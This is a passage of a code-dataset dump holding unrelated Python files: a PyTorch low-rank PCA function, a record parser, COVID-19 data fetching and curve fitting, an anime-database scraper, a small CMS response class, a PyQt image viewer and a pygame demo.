By default, ``q = min(6, m,\n n)``.\n\n center (bool, optional): if True, center the input tensor,\n otherwise, assume that the input is\n centered.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2.\n\n References::\n\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n\n if not torch.jit.is_scripting():\n if type(A) is not torch.Tensor and has_torch_function((A,)):\n return handle_torch_function(pca_lowrank, (A,), A, q=q, center=center, niter=niter)\n\n (m, n) = A.shape[-2:]\n\n if q is None:\n q = min(6, m, n)\n elif not (q >= 0 and q <= min(m, n)):\n raise ValueError('q(={}) must be non-negative integer'\n ' and not greater than min(m, n)={}'\n .format(q, min(m, n)))\n if not (niter >= 0):\n raise ValueError('niter(={}) must be non-negative integer'\n .format(niter))\n\n dtype = _utils.get_floating_dtype(A)\n\n if not center:\n return _svd_lowrank(A, q, niter=niter, M=None)\n\n if _utils.is_sparse(A):\n if len(A.shape) != 2:\n raise ValueError('pca_lowrank input is expected to be 2-dimensional tensor')\n c = torch.sparse.sum(A, dim=(-2,)) / m\n # reshape c\n column_indices = c.indices()[0]\n indices = torch.zeros(2, len(column_indices),\n dtype=column_indices.dtype,\n device=column_indices.device)\n indices[0] = column_indices\n C_t = torch.sparse_coo_tensor(\n indices, c.values(), (n, 1), dtype=dtype, device=A.device)\n\n ones_m1_t = torch.ones(A.shape[:-2] + (1, m), dtype=dtype, device=A.device)\n M = _utils.transpose(torch.sparse.mm(C_t, ones_m1_t))\n return _svd_lowrank(A, q, niter=niter, M=M)\n else:\n c = A.sum(dim=(-2,)) / m\n C = c.reshape(A.shape[:-2] + (1, n))\n ones_m1 = torch.ones(A.shape[:-1] + (1, ), dtype=dtype, device=A.device)\n M = ones_m1.matmul(C)\n return _svd_lowrank(A - M, q, niter=niter, M=None)\n","sub_path":"torch/_lowrank.py","file_name":"_lowrank.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"385738780","text":"import re\nfrom itertools import islice\n\nimport pandas as pd\n\nfrom . import helpers\n\nclass Record():\n def __init__(self, string):\n self.__dim= 0\n self.__size = 0\n self.__schema = None\n self.__data = {}\n\n string = string[9:-1] # Trim '(Record ...)'\n self.parse_input_string(string)\n\n def __str__(self):\n return \"\"\"Record:\n dim: {}\n size: {}\n schema: {}\n data: {}\n \"\"\".format(self.dim, self.size, self.schema, self.data)\n\n @property\n def dim(self):\n return self.__dim\n\n @property\n def size(self):\n return self.__dim\n\n @property\n def schema(self):\n return self.__schema\n\n @property\n def data(self):\n return self.__data\n\n def clean_freq_data(self):\n # In the files used as reference when creating this every record\n # contained a list of all the frequency points. This is nonsense\n if \"Freq\" not in self.__data:\n raise KeyError(\"Data does not contain frequency field\")\n\n self.data[\"Freq\"] = self.data[\"Freq\"][0]\n\n def parse_input_string(self, string):\n data_re = re.compile(r'\\(data[\\s\\S]+\\)')\n matches = re.search(data_re, string)\n if data_re:\n data = matches.group(0)\n data = data[4:-1] # strip \"(data ...)\"\n string = re.sub(data_re, '', string)\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n \n if keyword == 'schema':\n self.__schema = Schema(string[i:end+1])\n for key in self.schema.fields.keys():\n self.__data[key] = []\n skip = end-i\n next(islice(it, skip, skip), None)\n\n elif keyword == 'numDims':\n self.__dim = statement[1]\n \n elif keyword == 'size':\n self.__size = statement[1]\n\n else:\n raise KeyError('Unexpected keyword: {}'.format(statement[0]))\n\n record_locs = [x.start() for x in re.finditer('\\((record)', data)]\n records = []\n for i, _ in enumerate(record_locs):\n if i == len(record_locs)-1:\n records.append(data[record_locs[-1]:-2])\n else:\n records.append(data[record_locs[i]:record_locs[i+1]-2])\n\n for record in records:\n record_dict = self.parse_record(record)\n\n def parse_record(self, record):\n record = record[7:-1] # strip \"(record ...)\"\n fields = re.findall('\\(([^)]+)', record)\n for field in fields:\n field_name = re.search('\\\"\\w+\\\"', field).group(0).strip('\"')\n list_search = re.search('\\[.*\\]', field) \n number_search = re.search('-?\\d+\\.?\\d*', field)\n\n # This converts the freqs to floats which is okay but maybe not ideal\n if list_search:\n field_val = list_search.group(0)\n field_val = re.sub('[\\[\\]]', '', field_val).strip()\n field_val = [float(x) for x in field_val.split()]\n elif number_search:\n field_val = number_search.group(0)\n field_val = float(field_val)\n\n self.__data[field_name].append(field_val)\n \n def to_dataframes(self):\n proper_keys = (\"Mag\", \"Phase\", \"Vpos\", \"Hpos\", \"HV\", \"Freq\")\n if not all(k in self.data.keys() for k in proper_keys):\n raise KeyError(\"Record does not contain the correct keys: {}\".format(self.data.keys()))\n \n pos = list(zip(self.data[\"Vpos\"], self.data[\"Hpos\"]))\n dataframes = {}\n for i, freq in enumerate(self.data[\"Freq\"]):\n mags = [mag[i] for mag in self.data[\"Mag\"]]\n phases = [phase[i] for phase in self.data[\"Phase\"]]\n df = pd.DataFrame({'Position': pos, 'Mag': mags, 'Phase': phases})\n dataframes['{}'.format(freq)] = df\n\n return dataframes\n\n\n\nclass Schema():\n def __init__(self, string):\n self.__numFields = 0\n 
self.__fields = {}\n\n string = string[7:-1] # strip \"(schema ...)\"\n\n it = iter(enumerate(string))\n for i, c in it:\n if c == '(':\n end = helpers.find_close_paren(string, start=i)\n statement = re.sub('[\\(\\)]', '', string[i:end]).split()\n keyword = statement[0]\n\n if keyword == 'numFields':\n self.__numFields = statement[1]\n\n elif keyword == 'fieldName':\n self.new_field(string[i:end+1])\n skip = end-i\n next(islice(it, skip, skip), None)\n\n else:\n raise NotImplementedError('{} is not yet implemented\\n\\tFull statement: {}'.format(keyword, statement))\n\n def __str__(self):\n return \"\"\"\n numFields: {}\n fields: {}\n \"\"\".format(self.__numFields, self.__fields)\n\n @property\n def fields(self):\n return self.__fields\n\n @property\n def numFields(self):\n return self.__numFields\n\n def new_field(self, string):\n string = string[10:-1]\n fields = [s.strip().split() for s in re.split(r'[()]', string) if not s.isspace()]\n fieldname = fields[0][0].strip('\"')\n fields = fields[1:]\n temp = {}\n for field in fields:\n temp[field[0]] = field[1]\n\n self.__fields[fieldname] = temp\n\n\n\n \n","sub_path":"chamberplot/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"521081280","text":"import pandas as pd\nimport numpy as np\nfrom lmfit.models import StepModel\nimport os.path\n\ncases = 'https://covid.ourworldindata.org/data/ecdc/total_cases.csv'\ndeaths = 'https://covid.ourworldindata.org/data/ecdc/total_deaths.csv'\nUS_cases = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_confirmed_US.csv\"\nUS_deaths = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data\" \\\n \"/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\"\n\n\ndef state(s):\n return f'http://covidtracking.com/api/v1/states/{s}/daily.csv'\n\n\ndef date_to_int(s: str):\n padded = [x.zfill(2) for x in s.split('/')]\n return int(''.join([padded[i] for i in [2, 0, 1]]))\n\n\ndef date_to_str(d):\n s = str(d)\n s = [s[i:i + 2] for i in range(0, len(s), 2)]\n s[0] = \"20\" + s[0]\n return '-'.join(s)\n\n\ndata = dict()\ndata2 = dict()\n\npreds = dict()\n\nstate_data = dict()\n\nUS_data = dict()\nUS_data2 = dict()\n\npopulation_state = dict()\npopulation_county = dict()\n\n\ndef get_data(date):\n if date in data:\n return data[date]\n elif os.path.isfile(f\"assets/cases/df_{date}.csv\"):\n df = pd.read_csv(f\"assets/cases/df_{date}.csv\")\n data[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(cases)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n df.to_csv(f\"assets/cases/df_{len(df.index) - 1}.csv\")\n data[len(df.index) - 1] = df\n return df\n\n\ndef get_data2(date):\n if date in data2:\n return data2[date]\n elif os.path.isfile(f\"assets/deaths/df2_{date}.csv\"):\n df = pd.read_csv(f\"assets/deaths/df2_{date}.csv\")\n data2[date] = df\n else:\n print('Getting File...')\n df = pd.read_csv(deaths)\n df = df.fillna(0)\n if len(df.index) - 1 > date:\n df = df.iloc[:date + 1]\n df.to_csv(f\"assets/deaths/df2_{len(df.index) - 1}.csv\")\n data2[len(df.index) - 1] = df\n return df\n\n\ndef get_us_data(date):\n if date in US_data:\n df = US_data[date]\n return df\n elif os.path.isfile(f\"assets/john_hopkins/cases_{date}.csv\"):\n df = pd.read_csv(f\"assets/john_hopkins/cases_{date}.csv\", index_col=0)\n US_data[date] = df\n return df\n else:\n print(\"Getting data...\")\n df = pd.read_csv(US_cases)\n df.columns.values[11:] = df.columns[11:].map(date_to_int).values\n df = df.T[np.concatenate([np.array([True] * 11), df.T.index[11:] <= date])].T\n US_data[df.columns[-1]] = df\n df.to_csv(f\"assets/john_hopkins/cases_{df.columns[-1]}.csv\")\n return df\n\n\ndef get_us_data2(date):\n if date in US_data2:\n df2 = US_data2[date]\n return df2\n elif os.path.isfile(f\"assets/john_hopkins/deaths_{date}.csv\"):\n df2 = pd.read_csv(f\"assets/john_hopkins/deaths_{date}.csv\", index_col=0)\n US_data2[date] = df2\n return df2\n else:\n print(\"Getting data...\")\n df2 = pd.read_csv(US_deaths)\n df2.columns.values[12:] = df2.columns[12:].map(date_to_int).values\n df2 = df2.T[np.concatenate([np.array([True] * 12), df2.T.index[12:] <= date])].T\n US_data2[df2.columns[-1]] = df2\n df2.to_csv(f\"assets/john_hopkins/deaths_{df2.columns[-1]}.csv\")\n return df2\n\n\ndef get_state_data2(s: str, date: int):\n s = s.upper()\n if (s, date) in state_data:\n return state_data[(s, date)]\n elif os.path.isfile(f\"assets/state/df_{s}_{date}.csv\"):\n df = pd.read_csv(f\"assets/state/df_{s}_{date}.csv\", index_col=0)\n state_data[(s, date)] = df\n else:\n print('Getting File...')\n df = pd.read_csv(state(s))\n df = df[df['date'] >= 
20200304]\n df = df[df['date'] <= date]\n df = pd.DataFrame(df.values[::-1], range(len(df.index)), df.columns)\n df = df.fillna(0)\n df.to_csv(f\"assets/state/df_{s}_{df['date'].iloc[-1]}.csv\")\n state_data[(state, date)] = df\n return df\n\n\ndef get_state_data(s: str, date: int):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[df['Province_State'] == s].sum(), df2[df2['Province_State'] == s].sum()],\n axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_state[s] = tmp.iloc[-1, 1]\n return tmp.iloc[11:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_state_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef get_state_model(s, date, tp):\n df = get_state_data(s, date)\n fit = get_state_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_state_options(date):\n global population_state\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = df.groupby('Province_State').sum()\n tmp = tmp.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False) > 100\n states = tmp2.loc[tmp2].index.values\n min_dates = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n population_state = {**population_state, **df2.groupby('Province_State')['Population'].sum().to_dict()}\n return states, min_dates, population_state\n\n\ndef get_county_data(s, county, date):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[(df['Province_State'] == s) & (df['Admin2'] == county)].iloc[0, 11:],\n df2[(df2['Province_State'] == s) & (df2['Admin2'] == county)].iloc[0, 11:]], axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_county[', '.join([county, s])] = tmp.iloc[-1, 1]\n return tmp.iloc[:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_county_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef get_county_model(s, county, date, tp):\n df = get_county_data(s, county, date)\n fit = get_county_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_county_options(date):\n global population_county\n df = get_us_data(date).iloc[:, 5:]\n df2 = get_us_data2(date)\n tmp = df.groupby(['Province_State', 'Admin2']).sum()#.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False).gt(100)\n tmp2 = np.array([*tmp2.loc[tmp2].index.values])\n counties = dict()\n for s in np.unique(tmp2[:, 0]):\n counties[s] = tmp2[tmp2[:, 0] == s][:, 1].tolist()\n states = list(counties.keys())\n tmp2 = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n min_dates = dict()\n for s, c in tmp2.index:\n if s not in min_dates:\n min_dates[s] = {}\n min_dates[s][c] = tmp2.loc[(s, c)]\n tmp = df2.groupby(['Province_State', 'Admin2'])['Population'].sum()\n population_county = {s: tmp.xs(s).to_dict() for s in np.unique(np.array([*tmp.index.values])[:, 0])}\n return states, counties, min_dates, population_county\n\n\ndef get_fit(df, country):\n x, y = df[df[country] > 0][country].index.values, df[df[country] > 0][country].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n # Give no weight\n # fit = 
mod.fit(y, pars, x=x)\n\n # Give weight to highest points\n # fit = mod.fit(y, pars, x=x, weights=(1 / (y + 1e-3))[::-1])\n\n # Or give weight to newest points\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n\n # Or give weight to least and highest points using sech\n # y_max = y.max()\n # coe = 10 / y_max\n # fit = mod.fit(y, pars, x=x, weights=(1 - 1/np.cosh(coe*(y - y_max / 2))))\n\n # Or give weight to least and highest points using polynomial\n # y_max = y.max()\n # fit = mod.fit(y, pars, x=x, weights=pow(y - y_max / 2, 4) / pow(y_max / 2, 4))\n return fit\n\n\ndef get_model(country, date):\n df = get_data(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_death_model(country, date):\n df = get_data2(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef find_end_day(fit, percent):\n goal = int(fit.params['amplitude'].value) * percent\n i = 0\n while True:\n if fit.eval(x=i) >= goal:\n return i\n i += 1\n\n\ndef get_prediction(country, date):\n print(date)\n if date in preds:\n return preds[date][country]\n elif os.path.isfile(f\"assets/nn/preds_nn_{date}.csv\"):\n df = pd.read_csv(f\"assets/nn/preds_nn_{date}.csv\", index_col=0)\n preds[date] = df\n return df[country]\n else:\n print(\"File not created...\")\n # pred = make_prediction(df, df.index[-1] + 50)\n # return pred\n return None\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"154744982","text":"import time\n\n#打印当前时分秒\ndef test_time():\n\tmyTime = time.strftime('%Y%m%d%H%M%S')\n\tmyTime1 = int(time.time()*10000)\n\t#time.time 输出的是时间戳\n\tprint(myTime)\n\tprint(myTime1)\n\n\n\n\nif __name__ == '__main__':\n\ttest_time()","sub_path":"python/work/useful.py","file_name":"useful.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"294668749","text":"\nimport requests\nimport pandas as pd\nimport time\nimport logging\nfrom argparse import ArgumentParser\n\n\ndef get_range():\n parser = ArgumentParser()\n parser.add_argument('-r', '--range', type=int, dest='range',\n help=\"range\", metavar=\"Range\")\n\n args = parser.parse_args()\n\n if (args.range):\n return(args.range)\n\n return 1\n\n\ndef get_person(id):\n apiUrl = f'{base_url}/person/{i}'\n\n person = {}\n response = object()\n\n try:\n response = requests.get(apiUrl)\n response.raise_for_status()\n except requests.exceptions.Timeout:\n tries = 0\n while tries < 5 and response.status_code != 200:\n tries += 1\n response = requests.get(apiUrl)\n except requests.exceptions.ConnectionError as e:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Connection error: ' + e.strerror)\n except requests.exceptions.HTTPError as e:\n if (e.response.status_code):\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Person id=' + str(i) + ' does not exist')\n else:\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Error while retrieving ' + str(i) + ' with status code ' + str(response.status_code))\n else:\n jsonResult = response.json()\n\n person['id'] = str(jsonResult['mal_id'])\n person['name'] = jsonResult['name']\n person['given_name'] = jsonResult['given_name']\n person['family_name'] = jsonResult['family_name']\n person['alternate_names'] = jsonResult['alternate_names']\n person['birthday'] = jsonResult['birthday']\n person['member_favorites'] = str(jsonResult['member_favorites'])\n person['about'] = jsonResult['about']\n person['voice_acting_roles'] = [{'role': x['role'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name'],\n 'character_id': str(x['character']['mal_id']),\n 'character_name': x['character']['name']}\n for x in jsonResult['voice_acting_roles']]\n person['anime_staff_positions'] = [{'position': x['position'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name']}\n for x in jsonResult['anime_staff_positions']]\n person['published_manga'] = [{'position': x['position'],\n 'manga_id': str(x['manga']['mal_id']),\n 'manga_name': x['manga']['name']}\n for x in jsonResult['published_manga']]\n person['timestamp'] = time.strftime(\n '%Y-%m-%dT%H:%M:%SZ', time.gmtime())\n\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Successfully retrieved: ' + jsonResult['name'] + ' id=' + str(id))\n\n return person\n\n\ndef save_to_csv(animes):\n try:\n df = pd.json_normalize(animes)\n df.to_csv(master, mode='a',\n index=False, header=False)\n except:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Error while saving person data')\n\n\nlogging.basicConfig(filename='../../mal_person_parser.log', level=logging.INFO)\n\nbase_url = 'https://api.jikan.moe/v3'\nup_to = get_range()\n\n# Get the starting point\nmaster = '../../dataset/person.csv'\nstart = 1\ntry:\n mDf = pd.read_csv(master)\n start = int(mDf.iloc[-1, 0]) + 1\n print(f'Retrieving {up_to} items starting from {str(start)}')\nexcept pd.io.common.EmptyDataError:\n print('Person dataset is empty!')\n start = 1\nexcept IndexError:\n print('Person dataset is empty!')\n start = 1\n\npersons = []\n\ncount = 0\n\nfor i in range(start, start + up_to):\n person = get_person(i)\n if (person):\n persons.append(person)\n count = count+1\n\n time.sleep(5)\n\n if(count % 10 == 0 and count != 0):\n save_to_csv(persons)\n persons = 
[]\n\nsave_to_csv(persons)\n","sub_path":"src/mal-scraper/getPersons.py","file_name":"getPersons.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"496717323","text":"class CMSResponse:\n\n def __init__(self, request, response):\n self.request = request\n self.response = response\n\n def html(self, content, status='200 OK'):\n return self.output(\n content,\n status\n )\n\n def js(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/javascript'\n )\n\n def css(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/css'\n )\n\n def json(self, content):\n return self.output(\n content,\n '200 OK',\n 'application/json'\n )\n\n def jpg(self, filename):\n with open(filename, 'rb') as f:\n content = f.read()\n self.response('200 OK', [\n (\"Content-Type\", 'image/jpg'),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n\n def sendHTML(self, html, status='200 OK', meta={}):\n import os\n import json\n\n if self.request.get('domain_exists') and self.request.get('setting_exists'):\n with open(self.request.get('setting_json'), 'r') as f:\n setting = json.load(f)\n\n def CMS_Meta(options):\n return meta.get(options, '')\n\n def CMS_Setting(options):\n return setting.get(options, '')\n\n page_render = html\n template_path = self.request.get('theme_dir')\n if not os.path.exists(os.path.join(template_path, html)):\n from .CMSConfig import config\n template_path = config.dir_default\n\n if not os.path.exists(os.path.join(template_path, html)):\n html = '404Theme.html'\n\n from jinja2 import Environment, FileSystemLoader, select_autoescape\n jinja = Environment(\n loader=FileSystemLoader(\n template_path\n ),\n autoescape=select_autoescape(['html', 'xml']),\n enable_async=True,\n block_start_string='',\n block_end_string=' ',\n variable_start_string='',\n variable_end_string=' ',\n comment_start_string='',\n comment_end_string=' '\n )\n content = jinja.get_template(html)\n content = content.render(\n CMS_Meta=CMS_Meta,\n CMS_Setting=CMS_Setting,\n page_render=page_render\n )\n return self.html(content, status)\n\n def show404(self):\n return self.sendHTML('404.html', '404 Not Found')\n\n def output(self, content, status='200 OK', type=\"text/html\"):\n content = bytes(content, encoding='utf-8') if content else b\"\\n\"\n self.response(status, [\n (\"Content-Type\", type),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n","sub_path":"cmscore/CMSResponse.py","file_name":"CMSResponse.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"383907088","text":"from PyQt5 import Qt\nfrom PyQt5 import QtCore,QtWidgets,QtGui\nimport sys\nimport PyQt5\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QFileDialog, QGraphicsRectItem, QGraphicsScene\nfrom PyQt5.QtGui import QPixmap, QImage\nfrom PyQt5.QtCore import QSize\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport imgui as window\nimport window2\n\n\nclass MainWindow():\n def __init__(self):\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n self.raw_image = None\n self.ui = window.Ui_MainWindow()\n self.ui.setupUi(MainWindow)\n self.action_connect()\n MainWindow.show()\n self.graph_sence = CARscene()\n sys.exit(app.exec_())\n\n\n# 信号槽绑定\n def action_connect(self):\n self.ui.action.triggered.connect(self.open_file)\n # self.ui.action_2.triggered.connect(self.save_file)\n # self.ui.action_5.triggered.connect(self.recover_img)\n #\n # # 打开摄像头\n # self.ui.action_17.triggered.connect(self.new_camera)\n #\n # # 标记人脸位置\n # self.ui.action_18.triggered.connect(self.mark_face)\n\n# 显示图片\n def show_image(self):\n img_cv = cv2.cvtColor(self.current_img, cv2.COLOR_RGB2BGR)\n img_width, img_height, a = img_cv.shape\n ratio_img = img_width/img_height\n ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n if ratio_img > ratio_scene:\n width = int(self.ui.graphicsView.width())\n height = int(self.ui.graphicsView.width() / ratio_img)\n else:\n width = int(self.ui.graphicsView.height() * ratio_img)\n height = int(self.ui.graphicsView.height())\n img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n h, w, c = img_resize.shape\n bytesPerLine = w * 3\n qimg = QImage(img_resize.data, w, h, bytesPerLine, QImage.Format_RGB888)\n self.scene = QGraphicsScene()\n pix = QPixmap(qimg)\n self.scene.addPixmap(pix)\n self.ui.graphicsView.setScene(self.scene)\n\n# # 显示灰度图像\n# def show_grayimage(self):\n# img_cv = self.gray_image\n# img_width, img_height = img_cv.shape\n# ratio_img = img_width/img_height\n# ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n# if ratio_img > ratio_scene:\n# width = int(self.ui.graphicsView.width())\n# height = int(self.ui.graphicsView.width() / ratio_img)\n# else:\n# width = int(self.ui.graphicsView.height() * ratio_img)\n# height = int(self.ui.graphicsView.height())\n# img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n# h, w = img_resize.shape\n# qimg = QImage(img_resize.data, w, h, w, QImage.Format_Grayscale8)\n# self.scene = QGraphicsScene()\n# pix = QPixmap(qimg)\n# self.scene.addPixmap(pix)\n# self.ui.graphicsView.setScene(self.scene)\n\n#\n# # 显示直方图\n# def show_histogram(self):\n# if self.raw_image is None:\n# return 0\n# img = self.current_img\n# plt.figure(figsize=((self.ui.tab_3.width()-10)/100, (self.ui.tab_3.width()-60)/100), frameon=False)\n# plt.hist(img.ravel(), bins=256, range=[0, 256])\n# plt.axes().get_yaxis().set_visible(False)\n# # plt.axes().get_xaxis().set_visible(False)\n# ax = plt.axes()\n# # 隐藏坐标系的外围框线\n# for spine in ax.spines.values():\n# spine.set_visible(False)\n# plt.savefig('Hist.png', bbox_inches=\"tight\", transparent=True, dpi=100)\n# pix = QPixmap(\"Hist.png\")\n# self.ui.label.setPixmap(pix)\n# self.ui.label_2.setPixmap(pix)\n# self.ui.label_3.setPixmap(pix)\n\n\n\n# 打开图片\n def open_file(self):\n fname = QFileDialog.getOpenFileName(None, '打开文件', './', (\"Images (*.png *.xpm *.jpg)\"))\n if fname[0]:\n img_cv = cv2.imdecode(np.fromfile(fname[0], 
dtype=np.uint8), -1) # 注意这里读取的是RGB空间的\n self.raw_image = img_cv\n self.last_image = img_cv\n self.current_img = img_cv\n self.show_image()\n self.imgskin = np.zeros(self.raw_image.shape)\n\n# # 恢复图片\n# def recover_img(self):\n# self.current_img = self.raw_image\n# self.show_image()\n# self.show_histogram()\n# self.intial_value()\n#\n# # 饱和度\n# def change_saturation(self):\n# if self.raw_image is None:\n# return 0\n#\n# value = self.ui.horizontalSlider.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 2:\n# img_hsv[:, :, 2] = np.log(img_hsv[:, :, 2] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 2] = np.uint8(img_hsv[:, :, 2] / np.log(- value + np.e))\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 明度调节\n# def change_darker(self):\n# if self.raw_image is None:\n# return 0\n# value = self.ui.horizontalSlider_4.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 3:\n# img_hsv[:, :, 1] = np.log(img_hsv[:, :, 1] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 1] = np.uint8(img_hsv[:, :, 1] / np.log(- value + np.e))\n# self.last_image = self.current_img\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 人脸识别\n def detect_face(self):\n img = self.raw_image\n face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n return faces\nclass CARscene(QtWidgets.QGraphicsScene):\n def __init__(self, parent=None):\n super(CARscene, self).__init__(parent)\n def mousePressEvent(self, QMouseEvent):\n print(\"??\")\n #这行代码是期望显示坐标,奈何永远都是[0.0, 0.0]\n print(QMouseEvent.globalPos())\n\nif __name__ == \"__main__\":\n MainWindow()\n","sub_path":"src/com.ce/img-test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"117376912","text":"import pygame\n\nsize = width, height = 400, 300\nscreen = pygame.display.set_mode(size)\nclock = pygame.time.Clock()\n\nrunning = True\nx1, y1 = 0, 0\ndrawing = False # режим рисования выключен\nr = 0\nv = 10\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n drawing = True\n screen.fill(pygame.Color('blue'))\n x1, y1 = event.pos\n r = 0\n pygame.draw.circle(screen, (255, 255, 0), event.pos, int(r))\n if drawing:\n pygame.draw.circle(screen, (255, 255, 0), (x1, y1), int(r))\n pygame.display.flip()\n r += v * clock.tick() / 1000\n screen.fill(pygame.Color('blue'))\npygame.quit()","sub_path":"PyGame2/Yellow_ball.py","file_name":"Yellow_ball.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
